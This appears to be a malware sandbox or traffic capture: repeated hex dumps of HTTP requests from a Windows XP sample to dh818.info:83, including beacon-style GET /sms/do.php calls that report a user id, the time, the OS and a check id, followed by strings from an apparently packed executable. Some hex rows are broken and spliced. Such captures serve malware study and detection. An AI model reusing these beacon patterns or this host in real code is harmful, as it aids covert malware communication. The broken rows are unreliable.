0x000000a0 (00160)   0a486f73 743a2031 2e646838 31382e69   .Host: 1.dh818.i
0x000000b0 (00176)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a6c6c 612f342e 30202863 6f6d7061   ..lla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a 31333920   ep-Alive....139 
0x00000150 (00336)   33313331 32363633 2020203d 30267061   31312663   =0&pa
0x00000160 (00352)   7569643d 31313931 3126630a            uid=11911&c.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f50 6f702e67 69662048   GET /2/Pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)   30292020 20323035 37363936 65203634   0)   2057696e 64
0x000000e0 (00224)   36663737 37332032 30346535 34323020   6f7773 204e5420 
0x000000f0 (00240)   33353265 33313362 20202020 57696e64   352e313b    Wind
0x00000100 (00256)   6f777320 4e542035 2e313b0a            ows NT 5.1;.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f2f 4c6f676f 2e676966   GET /2//Logo.gif
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2031 2e646838 31382e69   .Host: 1.dh818.i
0x000000b0 (00176)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a6c6c 612f342e 30202863 6f6d7061   ..lla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a 31333920   ep-Alive....139 
0x00000150 (00336)   33313331 32363633 2020203d 30267061   31312663   =0&pa
0x00000160 (00352)   7569643d 31313931 3126630a            uid=11911&c.

0x00000000 (00000)   47455420 2f322f50 6f702e67 69662048   GET /2/Pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)   30292020 20323035 37363936 65203634   0)   2057696e 64
0x000000e0 (00224)   36663737 37332032 30346535 34323020   6f7773 204e5420 
0x000000f0 (00240)   33353265 33313362 20202020 57696e64   352e313b    Wind
0x00000100 (00256)   6f777320 4e542035 2e313b0a            ows NT 5.1;.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f2f 4c6f676f 2e676966   GET /2//Logo.gif
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2031 2e646838 31382e69   .Host: 1.dh818.i
0x000000b0 (00176)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a6c6c 612f342e 30202863 6f6d7061   ..lla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a 31333920   ep-Alive....139 
0x00000150 (00336)   33313331 32363633 2020203d 30267061   31312663   =0&pa
0x00000160 (00352)   7569643d 31313931 3126630a            uid=11911&c.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f50 6f702e67 69662048   GET /2/Pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)   30292020 20323035 37363936 65203634   0)   2057696e 64
0x000000e0 (00224)   36663737 37332032 30346535 34323020   6f7773 204e5420 
0x000000f0 (00240)   33353265 33313362 20202020 57696e64   352e313b    Wind
0x00000100 (00256)   6f777320 4e542035 2e313b0a            ows NT 5.1;.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f2f 4c6f676f 2e676966   GET /2//Logo.gif
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2031 2e646838 31382e69   .Host: 1.dh818.i
0x000000b0 (00176)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a6c6c 612f342e 30202863 6f6d7061   ..lla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a 31333920   ep-Alive....139 
0x00000150 (00336)   33313331 32363633 2020203d 30267061   31312663   =0&pa
0x00000160 (00352)   7569643d 31313931 3126630a            uid=11911&c.

0x00000000 (00000)   47455420 2f322f50 6f702e67 69662048   GET /2/Pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)   30292020 20323035 37363936 65203634   0)   2057696e 64
0x000000e0 (00224)   36663737 37332032 30346535 34323020   6f7773 204e5420 
0x000000f0 (00240)   33353265 33313362 20202020 57696e64   352e313b    Wind
0x00000100 (00256)   6f777320 4e542035 2e313b0a            ows NT 5.1;.


Strings
1>'.BN
2[')~;
\%@2!R
3ODM 4d
#}6a!'
6'x=V	
8^A[rE
-8hhwK
@+9_3Q
a?2rEsP
A#}=~R
bLNZBA&
cJ8,}t
eOZ-@W
e'r-,N
&EV{k.bl(
^f2#Uz
^fv@TPp
GetProcAddress
~G]	p2
\ia_vo0
^I:nSV
iplEDD
]-IVX:H
jyD!n|UN
LoadLibraryA
'M$\,--
mg4S j
MZKERNEL32.DLL
!O[\	J*e
%P}:!E
P`KeD?
PN\$$N
rsKhf<
TJSt?j
>t (Y6o
Ua_Pp9
U[*N9G
$w^]iB
WO@X{:
\",,xj)
XR}=k*)
Yt$)e^g6
z9?+aK?(
z_ADyX
Zxf]qS&'